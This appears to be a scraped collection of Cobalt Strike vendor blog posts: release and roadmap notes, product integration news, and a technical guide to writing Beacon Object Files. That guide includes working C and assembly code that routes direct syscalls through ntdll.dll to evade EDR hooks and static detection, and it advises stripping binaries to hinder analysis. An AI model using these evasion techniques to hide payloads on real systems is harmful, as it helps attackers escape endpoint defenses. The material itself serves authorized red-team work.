Cobalt Strike Blog | Cobalt Strike Research and Development

Cobalt Strike 4.6: The Line In The Sand

Cobalt Strike 4.6 is now available. As I mentioned in the recent Roadmap Update blog post, this isn’t a regular release, as it mostly focuses on security updates. There are also a couple of useful updates for users. A major release is planned for this summer, so this release lays the groundwork for the changes that are coming at that point.

Execute-assembly 1MB Limit Increase

A number of users have been asking for this for quite some time, and the change that we made affect not only execute-assembly, but other tasks (eg. dllinject) as well. We have added three new settings to the Malleable C2 profile (tasks_max_size, tasks_proxy_max_size and tasks_dns_proxy_max_size) that can be used to control maximum size limits. Note that these settings need to be set prior to team server startup. If the size is increased at a later time, old artifacts will still use the previous size settings and tasks that are too large will be rejected.

Comprehensive information on the new settings can be found in the Cobalt Strike documentation.

Arsenal Kit

We have combined the individual kits in the Cobalt Strike arsenal into a single kit, appropriately known as the Arsenal Kit. Building this kit yields a single aggressor script that can be loaded instead of loading all of the separate kits individually. The kit is controlled by the arsenal_kit_config file which is used to configure the kits that are built with the build_arsenal_kit.sh script.

The Arsenal Kit can be downloaded by licensed users from the Cobalt Strike arsenal.

Security Updates

This is the main focus of the Cobalt Strike 4.6 release. It is a necessary step as it lays the groundwork for our future development efforts.

Product security is nothing new. There has always been anti-proliferation processing in the software and, as discussed in this blog post (published by Raphael Mudge in 2019), we do our due diligence when it comes to screening potential customers and working with law enforcement. I think it is worth pointing out that the processes described by Raphael in that blog post are still processes that are followed at HelpSystems today–specifically:

From time to time, we receive informal requests for technical assistance or records from private entities. Our policy is not to perform analysis for, provide deconfliction services to, or disclose our records to private entities upon informal request.

If we have information relevant to a law enforcement investigation, we comply with valid legal process.

This stance is to avoid frivolous requests and to protect our customer’s information.

We also investigate tips. We can’t usually share information back, but we look into things brought to our attention.

We are also proactive when it comes to searching for Cobalt Strike teamservers out in the wild. This work is carried out by our own, dedicated threat intelligence team and it helps us to improve our product controls. That team also issues takedown requests if cracked copies are found.

Over the past few releases, we have made enhancements to Cobalt Strike’s product security. We intentionally haven’t described product security changes in much detail, but we do take it very seriously. Product security has been and will continue to be a key feature on our roadmap.

The 4.5 release in December 2021 saw changes to product licensing and improvements on the watermarking in the software. Those changes made it significantly more difficult to tamper with the authorization ID and locate the ever-changing hidden watermarks, therefore making it easier for us to trace stolen copies of Cobalt Strike back to specific customers. We have yet to see any credible reports of cracked copies of the 4.5 release being used because of these changes. We have seen what are claimed to be cracked copies of 4.5 being sold, but those have all turned out to be older versions badged as 4.5. By design, if the watermarks in the 4.5 release are tampered with, it will simply no longer work.

The 4.6 release brings a change to how the teamserver is deployed. Rather than a Java .jar archive, the teamserver has been built as a native binary. The client is still shipped as a .jar archive but we also plan to change that at some point as well. You shouldn’t notice anything different about the update process itself, but it is important to note that “cobaltstrike.jar” is now just a container for the team server (“TeamServerImage”) and client (“cobaltstrike-client.jar”), both of which will automatically be extracted during the update process. One thing to bear in mind though is that due to the changes in how Cobalt Strike 4.6 is installed and how it runs, coupled with changes to the download infrastructure to facilitate those changes, any scripts that you might have to automate the update process will likely no longer work and will need to be changed.

What does this mean? For you, moving forward, there is no real change. You can still download, update and use Cobalt Strike in the same way–however, please be aware that in this instance, you will need to download 4.6 directly from the website as the version 4.5 updater is incompatible with this release and will not recognize that an update is available. For us, building the software in this way is another step forward in terms of product security.

This is a line in the sand for us. We needed to make these necessary security enhancements so that we can forge ahead with our new development strategy and deliver more of what matters to our users. Normal service will be resumed with the 4.7 release this summer. Cobalt Strike will be 10 years old then so we’re hoping to do that release justice to mark the occasion properly.

To see a full list of what’s new in Cobalt Strike 4.6, please check out the release notes. Licensed users can download version 4.6 from the website. To purchase Cobalt Strike or learn more, please contact us.

Building Upon a Strong Foundation

In the weeks ahead, Cobalt Strike 4.6 will go live and will be a minor foundational release before we move into our new development model. This release will be less about features and is more focused on bolstering security even further. This is all in preparation for a much bigger release later, which will also serve as a celebration of Cobalt Strike’s 10th birthday. As we approach this 10-year anniversary, we’ve also taken the time to reflect on the incredible journey of this product.

Raphael Mudge created and developed Cobalt Strike for many years, entirely on his own. With the acquisition by HelpSystems more than two years ago, additional support came along to bring about some great new features, including the reconnect button, new Aggressor Script hooks, the Sleep Mask Kit, and the User Defined Reflective Loader (UDRL).

Now, with Raphael’s vision always in mind, we have a growing team focused on supporting this solution to bring more stability and flexibility. We’re also dedicating additional resources to research activities, with the goal of creating and releasing new tools into the Community Kit and the Cobalt Strike arsenal. Additionally, we are placing a great deal of emphasis on the security of the product itself in order to prevent misuse by malicious, non-licensed users.

With this increased investment comes additional costs and a pricing change. In appreciation for current Cobalt Strike users and their support of the solution, the change will not affect existing customers. The price of Cobalt Strike for new customers will be $5,900 per user for a one-year license.

The bundle pricing for Cobalt Strike and Core Impact will remain the same so you can pair any version of Core Impact—basic, pro, or enterprise—with Cobalt Strike at a reduced cost. Cobalt Strike’s interoperability with Core Impact highlights another one of the advantages of being part of a company with an ever-growing list of cybersecurity offerings. Developers of these products work together to help organizations create a cohesive security strategy that provides full coverage of their environments.

As we continue to evolve with the threat landscape and strengthen Cobalt Strike accordingly, a permanent fixture in our strategy will always be to listen to our customers. Many aspects of our updates are a direct result of customer feedback, so we encourage you to keep being vocal about the features that you most want to see. 

Cobalt Strike Roadmap Update

Historically, Raphael Mudge, the creator of Cobalt Strike, didn’t typically talk about the Cobalt Strike roadmap publicly. He preferred to play his cards close to his chest and only revealed the details about each release when it went live (and he didn’t give much warning about the release date, either). That was his way of building excitement for each release. For the most part we’ve continued that tradition, but I’d like to spend a little time being a bit more transparent about our future development plans, before dropping back into the shadows.

I spent about a year working closely with Raphael after HelpSystems acquired Strategic Cyber, amongst other things being educated on what makes Cobalt Strike so special. One of the many things that he instilled in me is that the fundamental principles of Cobalt Strike are stability and flexibility. He was excited to see a team of experienced, professional software engineers being built around the product to provide the stability and we’ve continued to add flexibility over the past few releases – for example, with the recent sleep mask kit and user defined reflective loader kit. That’s our mantra: Stability and Flexibility.

Raphael also cautioned against adding cutting edge, out of the box evasion techniques to Cobalt Strike. The obvious danger is that once they’re inevitably fingerprinted, we’d get stuck in an endless loop of fixing those issues rather than working on new features. Cobalt Strike’s defaults are easily fingerprinted and that’s by design. The idea is that you bring your own tools and techniques to Cobalt Strike and use those. That’s what makes it unique.

We spend a lot of time engaging with our user community on social media, Slack and Discord, sometimes engaging directly in those threads and sometimes via DM, email or on video calls. I love that aspect of my role. It’s great to get the opportunity to interact directly with people that are using Cobalt Strike and see first-hand what’s working and what isn’t.

We’ve had a lot of feedback recently that some users just don’t have the time to work on their own tools because they’re so busy on engagements. We created the Cobalt Strike Community Kit to act as a central repository of extensions written by our users to make it easier to find useful tools but obviously there are cases where specific tools just don’t exist and you don’t have time to write them yourselves. We don’t want to abandon our core philosophy and start adding out of the box evasion to the core product, but we are making some changes.

Firstly, we are expanding the development team to provide additional capacity. Secondly, and more importantly, we are changing our development cycle so that we can give you your cake AND let you eat it.

Up until now, we have aimed to get at least three releases out per year. We are moving to a model where we will release updates to core Cobalt Strike (Stability and Flexibility) twice per year. One release will be in the Summer, and another in the Winter. You’re confused. I can sense it. “How does reducing the number of releases help?” Well, the second part of the new release schedule is to ramp up research activities and start releasing more tools outside the regular release schedule. What does this mean? The plan is that essentially, in between those core releases (which should contain more features due to the extended development time between them), we’ll be releasing a steady stream of tools into the Community Kit and/or into the Cobalt Strike arsenal. The location of each tool pretty much depends on the type of tool being released and whether we’re releasing the source as well.

There is a caveat to this, though. There is a little short-term pain while we pivot to this new release model. There will be a small, intermediate Cobalt Strike release this Spring (late March or early April) that doesn’t really have a lot of flashy new features for you, our users, but sets the foundation for future releases. We have a much bigger release planned that should ship around July/August to mark Cobalt Strike’s 10-year anniversary.

The future is bright. HelpSystems continues to invest in Cobalt Strike and expand the team around it. We will continue to listen to our users and give you the product and features that you need.

Feature requests can be submitted to [email protected] and I’m always happy to talk to users on social media, Slack and Discord.

Joe’s Transition

My career is taking me in a new and exciting direction, and I am stepping down from my role on the Cobalt Strike team.

I’ve spent the last year helping HelpSystems integrate Cobalt Strike into their processes and shift from a single developer to a team effort. I can honestly say that “Cobalt Strike is in great hands.”

I’ve seen tremendous growth and support from the Cobalt Strike community in the last 12 months. Thank you all for the generous support and outstanding research. Keep pushing forward. 

The team’s mantra will continue to focus on product stability and flexibility to the product’s attack chain. I’ve helped pack the roadmap with great features, many of which came directly from community requests.

I’ve been a user of Cobalt Strike for almost ten years now, and it has been an honor to be part of this team. I wish the team good luck and look forward to seeing their influence on professional security testing. 

I may be moving on, but I will continue to be part of the security community. My career has been filled with great opportunities and great people. I am very thankful for the generous support shown by our community.

Make sure to follow  @CoreAdvisories for Cobalt Strike related Twitter announcements. 

Incorporating New Tools into Core Impact

Core Impact has further enhanced the pen testing process with the introduction of two new modules. The first module enables the use of .NET assemblies, while the second module provides the ability to use BloodHound, a data analysis tool that uncovers hidden relationships within an Active Directory (AD) environment. In this blog, we’ll dive into how Core Impact users can put these new modules into action during their engagements.

In-memory .NET Assembly Execution

With the Core Impact “.NET Assembly Execution” module you can now include .NET assemblies in your engagements. This module accepts a path to a local executable assembly and runs it on a given target. You may pass arbitrary arguments, quoted or not, to this program as if you ran it from a command shell. It can be executed in a sacrificial process using the fork and run technique or inline in the agent process.

Sharing Resources: Core Impact and Cobalt Strike

Cobalt Strike, our adversary simulation tool that focuses on post-exploitation, also uses .NET assembly tools. The “.NET Assembly Execution” module is compatible with extensions commonly employed by Cobalt Strike users, providing an opportunity to broaden the reach of Core Impact. Any executions that employ the execute-assembly command in Cobalt Strike can be used as a shared resource when using both products for a testing engagement.

Some modules used by Cobalt Strike that can be now used within Core Impact include:

AD Data Collection using BloodHound

Another module, “Get AD data with SharpHound (BloodHound Collector),” is based on the same technology as the first. It was developed to enable the usage of BloodHound during an Active Directory attack to facilitate the reconnaissance steps. Bloodhound works by analyzing data about AD collected from domain controllers and domain-joined Windows systems, quickly detecting complex attack paths for lateral movement, privilege escalation, and more. Users can now incorporate these capabilities into their engagements to help identify these attack paths before threat actors do.

Expand Your Security Tests Even Further

With the introduction of these modules, Core Impact continues to help unify security. In addition to these modules, Core Impact integrates with other security tools, including multiple vulnerability scanners, PowerShell Empire, Plextrac, and more. Core Impact is particularly aligned Cobalt Strike, with interoperability features like session passing as well as the new “.NET Assembly Execution” module.

Successful security testing involves both talented cybersecurity professionals and the right portfolio of tools. Solutions that work with one another can help to maximize resources, reduce console fatigue, and standardize reporting. Tools like Core Impact can help serve as a point of centralization, helping organizations to advance their vulnerability management programs without overcomplicating strategies.

Cobalt Strike Training Options

The Cobalt Strike training web page has been updated. https://www.cobaltstrike.com/training/

The training web page lists free courses created by the Cobalt Strike team that provide an overview of the product. It also lists courses offered by trusted 3rd parties. The 3rd party courses use Cobalt Strike to some degree and can be a great way to practice and learn how Cobalt Strike can be used in a realistic environment.

The page will be updated as new courses are added.

Cobalt Strike Training

Writing Beacon Object Files: Flexible, Stealthy, and Compatible

Our colleagues over at Core Security have been doing great things with Cobalt Strike, making use of it in their own engagements. They wrote up this post on creating Cobalt Strike Beacon Object Files using the MinGW compiler on Linux. It covers several ideas and best practices that will increase the quality of your BOFs.

Flexibility

Compiling to Both Object Files and Executables

While writing a BOF is great, it’s always worth making the code compile to both BOF and EXE.

This provides a lot more options: we could run our capability outside Beacon by just writing the EXE to disk and executing it. We could then convert it into position independent shellcode using donut and run it from memory.

Usually, calling a Windows API from Beacon Object File would appear as follows:

program.h

WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *s, size_t maxlen);

program.c

int length = MSVCRT$strnlen(someString, 256);
BeaconPrintf(CALLBACK_OUTPUT, "The variable length is %d.", length);

Makefile

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
all:
    $(CC_x64) -c source/program.c -o compiled/$(BOFNAME).x64.o -masm=intel -Wall

However, we would like to create both a BOF and an EXE file using the same file. A practical option to achieve the creation of both files is to add a conditional compilation clause as shown below. In this example, we are using BOF:

Makefile

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
all:
    $(CC_x64) -c source/program.c -o compiled/$(BOFNAME).x64.o   -masm=intel -Wall -DBOF
    $(CC_x64)    source/program.c -o compiled/$(BOFNAME).x64.exe -masm=intel -Wall

program.h

#ifdef BOF
WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *s, size_t maxlen);
#define strnlen MSVCRT$strnlen
#endif
#ifdef BOF
#define PRINT(...) { \
     BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__); \
}
#else
#define PRINT(...) { \
     fprintf(stdout, __VA_ARGS__); \
     fprintf(stdout, "\n"); \
}
#endif

program.c

int length = strnlen(someString, 256);
PRINT("The variable length is %d.", length);

Finally, in our program.c file, we would define the “go” (BOF’s entry point) and “main” functions:

program.c

#ifdef BOF
void go(char* args, int length)
{
     // BOF code
}
#else
int main(int argc, char* argv[])
{
    // EXE code
{
#endif

Stealth

Syswhispers2 Integration

syswhispers2 is an awesome implementation of direct syscalls. However, if we take a look under the hood, we can see that it uses a global variable to achieve its objective. Unfortunately, global variables do not work very well with Beacon. This is because Beacon Object Files don’t have a .bss section, which is where global variables are typically stored.

A useful trick, originally suggested by Twitter user @the_bit_diddler, is to move the global variables to the .data section using a compiler directive, as shown below:

syscalls.c (before)

SW2_SYSCALL_LIST SW2_SyscallList;

syscalls.c (after)

SW2_SYSCALL_LIST SW2_SyscallList __attribute__ ((section(".data")));

This small change will allow the use of the syswhispers2 logic in a BOF.
In addition to the global variables change, there are other minor changes that need to be made so that the the code of syswhispers2 can compile with MinGW. For example, the API hashes format needs to be changed from 0ABCD1234h to: 0xABCD1234. The tool InlineWhispers should take care of the rest.

Using direct syscalls is a powerful technique to avoid userland hooks. Ironically, using them could get us caught.

There are at least two ways of detecting direct syscalls: dynamic and static.
The dynamic method is simply detecting that a syscall was called from a module that is not ntdll.dll. The static method is to find a syscall instruction by inspecting the program’s code and memory. How can we avoid both these detections? The answer is to call our syscalls from ntdll.dll.

First, we must locate where ntdll.dll is loaded. Luckily, syswhispers2 already has the code to do just that. Then, we can parse its headers and locate the code section.

Hiding the Use of syscalls

Once we know code section base address and size of ntdll.dll, all we need to do is search for the opcodes of the instructions syscall; ret. In x64, the bytes we are looking for are: { 0x0f, 0x05, 0xc3 }.

While it is true that EDRs and other tools hook (overwrite) syscalls in ntdll.dll, they certainly do not hook all existing syscalls, so we are guaranteed to find at least one occurrence of these three bytes. We might even find them by chance in a misaligned offset.

Once we find the syscall; ret bytes, we can save the address in a global variable (stored in the .data section). That way, we only need to find it once.

All what we have just described can be seen in the following code sequence:

syscalls.c

#ifdef _WIN64
#define PEB_OFFSET 0x60
#define READ_MEMLOC __readgsqword
#else
#define PEB_OFFSET 0x30
#define READ_MEMLOC __readfsdword
#endif

PVOID SyscallAddress __attribute__ ((section(".data"))) = NULL;
 
__attribute__((naked)) void SyscallNotFound(void)
{
    __asm__(" SyscallNotFound: \n\
        mov eax, 0xC0000225 \n\
        ret \n\
    ");
}

PVOID GetSyscallAddress(void)
{
#ifdef _WIN64
    BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
#else
    BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
#endif

    // Return early if the SyscallAddress is already defined
    if (SyscallAddress)
    {
        // make sure the instructions have not been replaced
        if (!strncmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
            return SyscallAddress;
    }
  
    // set the fallback as the default
    SyscallAddress = (PVOID) SyscallNotFound;
 
    // find the address of NTDLL
    PSW2_PEB Peb = (PSW2_PEB)READ_MEMLOC(PEB_OFFSET);
    PSW2_PEB_LDR_DATA Ldr = Peb->Ldr;
    PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
    PVOID DllBase = NULL;
    PVOID BaseOfCode = NULL;
    ULONG32 SizeOfCode = 0;
 
    // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
    // in the list, so it's safer to loop through the full list and find it.
    PSW2_LDR_DATA_TABLE_ENTRY LdrEntry;
    for (LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
    {
        DllBase = LdrEntry->DllBase;
        PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
        PIMAGE_NT_HEADERS NtHeaders = SW2_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
        PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
        DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (VirtualAddress == 0) continue;
 
        ExportDirectory = SW2_RVA2VA(PIMAGE_EXPORT_DIRECTORY, DllBase, VirtualAddress);
 
        // If this is NTDLL.dll, exit loop.
        PCHAR DllName = SW2_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
        if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
        if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c)
        {
            BaseOfCode = SW2_RVA2VA(PVOID, DllBase, NtHeaders->OptionalHeader.BaseOfCode);
            SizeOfCode = NtHeaders->OptionalHeader.SizeOfCode;
            break;
        }
    }
    if (!BaseOfCode || !SizeOfCode)
        return SyscallAddress;
 
    // try to find a 'syscall' instruction inside of NTDLL's code section
  
    PVOID CurrentAddress = BaseOfCode;
    PVOID EndOfCode = SW2_RVA2VA(PVOID, BaseOfCode, SizeOfCode - sizeof(syscall_code) + 1);
    while ((ULONG_PTR)CurrentAddress <= (ULONG_PTR)EndOfCode)
    {
        if (!strncmp((PVOID)syscall_code, CurrentAddress, sizeof(syscall_code)))
        {
            // found 'syscall' instruction in ntdll
            SyscallAddress = CurrentAddress;
            return SyscallAddress;
        }
        // increase the current address by one
        CurrentAddress = SW2_RVA2VA(PVOID, CurrentAddress, 1);
    }
    // syscall entry not found, using fallback
    return SyscallAddress;
}

syscalls.h

EXTERN_C PVOID GetSyscallAddress(void);

In the extremely unlikely scenario in which we do not find ANY occurrence of these three bytes in the code section of ntdll.dll, we can instead use our own function: SyscallNotFound. This simply returns STATUS_NOT_FOUND. We could implement a syscall; ret, but keep in mind that we want to avoid having the syscall instruction in our code in order to evade static analysis.

Once we have the memory address of interest, all we need to do is to modify the assembly of our syscall functions to jump to this memory address:

push rcx ; save volatile registers
push rdx
push r8
push r9
sub rsp, 0x28 ; allocate some space on the stack
call GetSyscallAddress ; call the C function and get the address of the 'syscall' instruction in ntdll.dll
add rsp, 0x28
push rax ; save the address in the stack
sub rsp, 0x28 ; allocate some space on the stack
mov ecx, 0x0123ABCD ; set the syscall hash as the parameter
call SW2_GetSyscallNumber ; get the id of the syscall using syswhispers2
add rsp, 0x28
pop r11 ; store the address of the 'syscall' instruction on r11
pop r9 ; restore the volatile registers
pop r8
pop rdx
pop rcx
mov r10, rcx
jmp r11 ; jump to ntdll.dll and call the syscall from there

And voilà, we use direct syscalls from a valid module (ntdll.dll) without having a syscall instruction in our code 😊.

Stripping the Debug Symbols

While this step is not critical, stripping your binaries is clever enough that it is worth the extra step. Once completed, they are not only a lot harder to analyze but they also get smaller in size.

All we need to do is modify the Makefile to look as follows:

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
STRIP_x64 := x86_64-w64-mingw32-strip
 
all:
    $(CC_x64) -c program.c -o compiled/$(BOFNAME).x64.o   -masm=intel -Wall -DBOF
    $(STRIP_x64) --strip-unneeded compiled/$(BOFNAME).x64.o
 
    $(CC_x64)    program.c -o compiled/$(BOFNAME).x64.exe -masm=intel -Wall
    $(STRIP_x64) --strip-all compiled/$(BOFNAME).x64.exe

While the EXE does end up being a smaller, stripping the BOF doesn’t reduce its size significantly (only around 500 bytes).

Once the debugging symbols are stripped, if the program is compiled without changing the code, the resulting object file and executable will be the same regardless of who compiled it. This means that everyone will get the same object files after compiling it.


Is that a bad thing? Potentially, but only if fingerprinting is a concern. The code could be slightly modified and recompiled. For example, the seed of syswhispers2 could be changed. If code is run from a Beacon or in memory in the form of shellcode, fingerprinting should not be worrisome, as static analysis in those cases is not possible.

Compatibility

Supporting x86 might seem hard and pointless, but we shouldn’t limit ourselves and have every 32-bit machine out of our reach. Supporting x86 is a fun challenge and pays off in the end.

Code Logic

We’ll begin by introducing some conditional compilation clauses based on the architecture:

#if _WIN64
// x64 version of some logic
#else
// x86 version of some logic
#endif

If we want to add some code that is exclusive to x64:

#if _WIN64
// some code only for x64
#endif

If we want to add some code that is exclusive to x86:

#ifndef _WIN64
// some code only for x86
#endif

X86 syscall Support

To support syscalls in x86, we will have to deal with a few difficulties that are very manageable.

Function Names Within x86 Assembly

The main issue that we can encounter trying to call the C functions SW2_GetSyscallNumber and GetSyscallAddress from x86 inline assembly, results in these compiler errors:

/usr/lib/gcc/i686-w64-mingw32/11.2.0/../../../../i686-w64-mingw32/bin/ld: /tmp/ccbjuGDN.o:program.c:(.text+0x68): undefined reference to `GetSyscallAddress'

/usr/lib/gcc/i686-w64-mingw32/11.2.0/../../../../i686-w64-mingw32/bin/ld: /tmp/ccbjuGDN.o:program.c:(.text+0x73): undefined reference to `SW2_GetSyscallNumber'

There is some GCC documentation which explains that, for some reason, in x86 inline assembly, C functions (and variables) are prepended with an underscore to their name. So, in this case,  GetSyscallAddress becomes _GetSyscallAddress and SW2_GetSyscallNumber becomes _SW2_GetSyscallNumber.

Instead of calling them with the underscore, we can just adapt their definition to specify their name in assembly, like this:

syscalls.h

EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash) asm ("SW2_GetSyscallNumber");
EXTERN_C PVOID GetSyscallAddress(void) asm ("GetSyscallAddress");

We also need to do the same with the definitions for all the syscalls in syscalls.h. For example, here’s how we can modify NtOpenProcess:

syscalls.h (before)

EXTERN_C NTSTATUS NtOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);

syscalls.h (after)

EXTERN_C NTSTATUS NtOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL) asm ("NtOpenProcess");

Once this is done, the weird x86 naming system should work fine.

Syscalls With Conflicting Types

There are some syscalls that fail to compile in x86, and produce an error message like:

error: conflicting types for ‘NtClose’;

While there are surely others, these syscalls are confirmed to have this issue:

  • NtClose
  • NtQueryInformationProcess
  • NtCreateFile
  • NtQuerySystemInformation
  • NtQueryObject

It appears that in x86, MinGW already has a definition of these functions somewhere. To fix this, we just need to rename the troubling syscalls by prepending an underscore to their name in the x86 version.

program.h

In program.c, we can call these functions normally, without prepending the underscore to their name.

X86 Assembly Code

For the assembly code, we’ll need to update syscalls-asm.h to look as follows:

syscalls-asm.h

Finally, the x86 assembly will look like this:

After all these changes, we have syscalls x86 support.

WoW64 Support?

WoW64 stands for Windows on Windows64, which means there are 32-bit programs running on 64-bit Windows machines.In WoW64 processes, syscalls are not called via a syscall or sysenter instruction. Instead, a jump to fs:[0xc0] is performed. Understanding the way this works requires a long explanation, but for the purpose of this article, all we need to know is that it translates syscalls from 32 to 64-bit so that the kernel can understand them.

One quick way of “supporting” syscalls on WoW64 processes is to perform the same jump from our code. However, there are a few drawbacks when doing this. First, this is by no means a direct syscall. EDRs can hook these calls. Additionally, in some syscalls that use pointers, we will not be able to reference addresses above 32-bit.

Truly supporting direct syscalls for WoW64 processes would require us to transition via a far jmp instruction into 64-bit code, translate the parameters to their 64-bit counterparts, adjust the calling convention, set the stack alignment and more. These actions alone could make up an entire post.

That being said, jumping to fs:[0xc0] is an easy trick and at least we would have some support for WoW64, which might be useful for some scenarios.

To detect if our program is running as WoW64 process, we’ll define a function called IsWoW64:

syscalls-asm.h

#if _WIN64
#define IsWoW64 IsWoW64
__asm__("IsWoW64: \n\
mov rax, 0 \n\
ret \n\
");
#else
#define IsWoW64 IsWoW64
__asm__("IsWoW64: \n\
mov eax, fs:[0xc0] \n\
test eax, eax \n\
jne wow64 \n\
mov eax, 0 \n\
ret \n\
wow64: \n\
mov eax, 1 \n\
ret \n\
");
#endif

syscalls.h

EXTERN_C BOOL IsWoW64(void) asm ("IsWoW64");

program.c

    if(IsWoW64())
    {
        PRINT("This is a 32-bit process running on a 64-bit machine!\n");
    }

If detection is a concern when running under a WoW64 context, just call IsWow64() and bail out if it returns as true.
This can be checked on the .CNA file in Cobalt Strike:

program.cna

$barch = barch($1);
$is64 = binfo($1, "is64");
if($barch eq "x86" && $is64 == 1)
{
    berror($1, "This program does not support WoW64");
    return;
}

We’ll also need to make a small change to the function GetSyscallAddress in order to set the syscall address to fs:[0xc0] if the process Is WoW64:

PVOID GetSyscallAddress(void)
{
#ifdef _WIN64
    BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
#else
    BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
#endif
 
#ifndef _WIN64
    if (IsWoW64())
    {
        // if we are a WoW64 process, jump to WOW32Reserved
        SyscallAddress = (PVOID)READ_MEMLOC(0xc0);
        return SyscallAddress;
    }
#endif
 
    // Return early if the SyscallAddress is already defined
    if (SyscallAddress)
    {
        // make sure the instructions have not been replaced
        if (!strncmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
            return SyscallAddress;
    }
 
    // set the fallback as the default
    SyscallAddress = (PVOID)DoSysenter;
    …

Finally, we’ll update our Makefile to compile for both 64 and 32-bit.

Makefile

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
CC_x86 := i686-w64-mingw32-gcc
STRIP_x64 := x86_64-w64-mingw32-strip
STRIP_x86 := i686-w64-mingw32-strip
 
all:
    $(CC_x64) -c program.c -o compiled/$(BOFNAME).x64.o   -masm=intel -Wall -DBOF
    $(STRIP_x64) --strip-unneeded compiled/$(BOFNAME).x64.o
 
    $(CC_x86) -c program.c -o compiled/$(BOFNAME).x86.o   -masm=intel -Wall -DBOF
    $(STRIP_x86) --strip-unneeded compiled/$(BOFNAME).x86.o

    $(CC_x64)    program.c -o compiled/$(BOFNAME).x64.exe -masm=intel -Wall
    $(STRIP_x64) --strip-all compiled/$(BOFNAME).x64.exe
 
    $(CC_x86)    program.c -o compiled/$(BOFNAME).x86.exe -masm=intel -Wall
    $(STRIP_x86) --strip-all compiled/$(BOFNAME).x86.exe
 
clean:
    rm compiled/$(BOFNAME).*.*

Conclusion

To summarize, this post explored several technical solutions to achieve the following objectives:

  • Create executables as well as BOF using the same codebase
  • Use syscalls from ntdll.dll instead of using them directly from an unknown module
  • Strip executables to make them smaller and harder to analyze
  • Run on both 64-bit and 32-bit
  • Have partial support for syscalls in WoW64

If you want to see an example of all this working together, check out nanodump.

User Defined Reflective Loader (UDRL) Update in Cobalt Strike 4.5

The User Defined Reflective Loader (UDRL) was first introduced in Cobalt Strike 4.4. to allow the creation and use of a custom reflective loader. This quickly took off by the community and its limits were pushed. Updates were made in 4.5 to help address some of these limits.

Updates

Increased Size

A new hook BEACON_DLL_SIZE was added to specify either 5k or 100k for your custom loader. This increase will be reflected in your payloads.

Artifact Kit

The artifact kit has been updated to allow customization of sizes to ensure space is available for your loader.

UDRL and Malleable C2 Profile Consideration

When using the default reflective loader and generating Beacons there are a few settings that affect Beacon’s runtime configuration and the loader, which are automatically handled when the payload is generated. This ability allows an operator to change these settings in the profile which will modify how the payload is generated and how it looks like in memory. 

When using a UDRL these settings are inserted into the Beacon’s runtime configuration. However, because the reflective loader is defined by the user it is not possible to modify the reflective loader as it does in the default case. It is on the user to modify their reflective loader accordingly. 

For example, if you are using the example loader from the URDL kit, there is no code in the loader to do any conditional setup based on information stored in the header of the image. This could cause runtime issues with Beacon that you are not expecting because of the settings in your Malleable C2 profile. You will have to deal with the same type of issues when writing your own reflective loader from scratch.

Settings to be Considered

The following are settings to consider when the malleable C2 profile option stage.sleepmask is set to TRUE:

stage.userwx 

This setting is a Boolean and informs the default loader to either use RWX or RX memory. At runtime Beacon will either include or not include the .text section for masking. If the setting is set to TRUE, your user defined loader needs to set the protection on the .text section as RWX otherwise Beacon will crash. If the setting is set to FALSE, your user defined loader should set the protection on the .text section as RX as the .text section will not be masked. 

stage.obfuscate 

This setting is a Boolean and informs the default loader to either copy the header or not copy the header into memory. At runtime Beacon will either include or not include the header section for masking. If the setting is set to TRUE, your UDRL should not copy the header into memory as Beacon will not mask the header section. If the setting is set to FALSE, your user defined loader should copy the header into memory as Beacon will mask the header section. 

Depending on how sophisticated your reflective loader is you will need to make sure the settings in the Malleable C2 profile will work with how the Beacon payload is loaded into memory. With the BEACON_RDLL_GENERATE and BEACON_RDLL_GENERATE_LOCAL aggressor script hooks you do have the opportunity to modify your reflective loader by using the aggressor script pe_* functions. 

Handling a UDRL over 5k

The following is an example error that indicates your loader is over 5k. You can use the BEACON_DLL_SIZE hook to increase this space to 100k.

Loader is over 5k

Artifact Kit Considerations

If you are using an artifact kit based on the kit provided by Cobalt Strike, but is using the default ‘stagesize‘ values, this error is logged indicating the larger patched Beacon will not fit in the standard artifacts generated for the kit. You will need to rebuild the artifact kit with larger ‘stagesize‘ environment variable definitions.

Artifact kit hook error when the stagesize value is too low

References

Sleep Mask Update in Cobalt Strike 4.5

The Sleep Mask Kit was first introduced in Cobalt Strike 4.4 to allow users to modify how the sleep mask function looks in memory in order to defeat static signatures that identified Beacon. This quickly took off in the community and its limits were pushed. Updates were made in 4.5 to help address some of these limits.

Licensed users can download the updated kit from https://www.cobaltstrike.com/scripts

What’s New?

Increased size 

